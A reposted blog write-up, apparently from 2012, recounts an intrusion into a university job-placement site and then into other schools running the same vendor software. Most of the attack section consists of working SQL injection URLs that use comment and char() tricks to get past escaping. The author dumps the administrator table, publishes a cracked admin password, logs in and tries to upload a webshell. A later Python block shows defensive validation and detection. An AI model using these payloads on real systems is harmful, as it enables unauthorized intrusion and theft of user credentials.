2012 SQL Injection (purely technical research, non-aggressive behavior)

Source: Internet
Author: User


1. Information gathering

Browsing job.xxx.edu.cn took a long time; only the information used later in the intrusion is recorded here. The site was developed by a technology company in Shenzhen. The login window on the homepage distinguishes three kinds of users: employers, graduates and administrators.


Scanning job.xxx.edu.cn with Acunetix showed that the /index_department.php page has SQL injection vulnerabilities.


Although Acunetix reported both the dep_id and gradyear parameters as injectable, later testing showed that only dep_id could actually be exploited.


Acunetix also found a phpinfo.php file. It shows that PHP is version 5.2.10 and that the magic_quotes_gpc option is on, which means that special characters such as ' (single quote), " (double quote), \ (backslash), whitespace and so on are escaped.


2. Exploiting the vulnerability

The error message shows that the backend database is MySQL.

http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=1 ""


An ORDER BY clause is used to guess the number of columns: 4 succeeds and 5 gives an error, so there are 4 columns. Because spaces are escaped, the comment sequence /**/ is used in place of spaces, and # is used to comment out the rest of the statement. The # is sent URL-encoded as %23, because a literal # in the address bar is treated by the browser as a fragment marker and is not passed to the server.

http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/order/**/by/**/5%23


Next, list the databases in MySQL through the information_schema system database, which was added in MySQL 5.0. Apart from information_schema there is only one database, job_xxx.

http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/union/**/select/**/1,schema_name,3,4/**/from/**/information_schema.schemata/**/%23


Because single quotes are escaped, the string job_xxx is supplied through the char() function instead: the numbers in parentheses are the ASCII values of the characters of job_xxx.

http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/=/**/char(106,111,98,95,...)/**/%23


The job_xxx database has several user-related tables: school_user, com_users and std_bases. Seeing these tables, one suspects that they correspond to the three kinds of users in the login window.

Look at which columns the school_user table has.

http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/=/**/char(115,99,104,111,111,108,95,117,115,101,114)/**/%23


The table has the promising columns user_name and user_password, so read them out.

http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/union/**/select/**/1,user_name,user_password,4/**/from/**/school_user%23


This table holds the administrator accounts. The first row is the highest-privilege admin, and the password is stored as an MD5 hash; looking the hash up on cmd5.com gives the password yuwei162372, and this username and password log in to the system successfully.


At this point the usernames and passwords of all users are already available. I wanted to go further and upload a webshell to control the whole server, but uploaded files have their extension stripped, so I had to give up.

3. Extending the results

During information gathering it became known that the site was developed by a technology company in Shenzhen, and the company's homepage shows that its system is also used by many other schools. In addition, the online counseling section of the school's employment website gives a list of the schools that use the software.


Taking xxx Normal University as an example, the intrusion process is basically the same. The only difference was a character-encoding problem when reading the user table, which was easily solved after a Google search.

http://xxx.yyy.com/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find=&dep_id=100/**/union/**/select/**/1,binary(user_name),binary(user_password),4/**/from/**/school_user%23


4. Summary

In the exploitation phase, because single quotes are escaped, every string in the constructed SQL statements has to be written with the char() function, and looking up the ASCII value of each character takes time. Sometimes a string can be replaced by a function instead, for example database() in place of Job_cqupt.
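The lesson behind both the phpinfo finding and the char()/comment evasions above is that magic_quotes_gpc only escapes characters, while dep_id is concatenated into the query as a bare number, so a payload that avoids quotes passes through unchanged. The Python below is an added illustration, not code from the original post or the affected application: it simulates PHP's addslashes() on a constructed copy of the page's dep_id payload, shows the integer-validation fix that closes the hole, and normalizes the /**/ and %23 evasions so a log review can flag such requests. All function names and the sample query are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed copies of dep_id values from the write-up (not live traffic).
PLAIN_ID = "1"
INJECTED_ID = ("100/**/union/**/select/**/1,schema_name,3,4"
               "/**/from/**/information_schema.schemata/**/%23")


def addslashes(value: str) -> str:
    """Simulate PHP's magic_quotes_gpc/addslashes(): backslash-prefix ' " \\ and NUL."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", value)


def query_with_magic_quotes(dep_id: str) -> str:
    """The weak pattern: escape, then concatenate an unquoted numeric parameter.
    The hypothetical table and column names stand in for the real query."""
    return "SELECT a, b, c, d FROM department WHERE dep_id = " + addslashes(dep_id)


def parse_dep_id(dep_id: str):
    """Hardened input handling: accept only a plain integer, otherwise reject (None).
    The caller then binds the integer as a query parameter instead of concatenating."""
    try:
        return int(unquote_plus(dep_id).strip())
    except ValueError:
        return None


def normalize(param: str) -> str:
    """Undo the evasions seen in the write-up before pattern matching:
    URL-decode (%23 -> #) and treat inline comments /**/ as the spaces they replace."""
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(param))


# Keywords taken from the page's payloads, checked on the normalized value.
INJECTION_SIGNS = re.compile(
    r"\b(union\s+select|order\s+by|information_schema|char\s*\()", re.I)


def looks_injected(param: str) -> bool:
    """True when a dep_id value carries the SQL keywords used in the write-up."""
    return INJECTION_SIGNS.search(normalize(param)) is not None


if __name__ == "__main__":
    # The "escaped" query still contains the whole payload: nothing was escaped.
    print(query_with_magic_quotes(INJECTED_ID))
    print(parse_dep_id(INJECTED_ID), parse_dep_id(PLAIN_ID))
    print(looks_injected(INJECTED_ID), looks_injected(PLAIN_ID))
```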

Once the SQL injection vulnerability is confirmed to be exploitable, tools such as Havij and Pangolin can be used to make the intrusion more efficient.


In the course of this intrusion I came across some good reading material, recorded here as well:

  • The Web Application Hacker's Handbook (in its Chinese edition): a comprehensive analysis of web application security holes and definitely a book worth reading.

  • The Dark Group forum's "Detailed MySQL injection": a very detailed and good article, worth reading a few more times when time allows to see what may have been missed.

  • "SQL Injection with MySQL" and "Advanced SQL Injection with MySQL" by Angel of the Security Angel group: very old articles, but the principles are explained very clearly.


This article is from the "Quiterr" blog; reprinting is declined.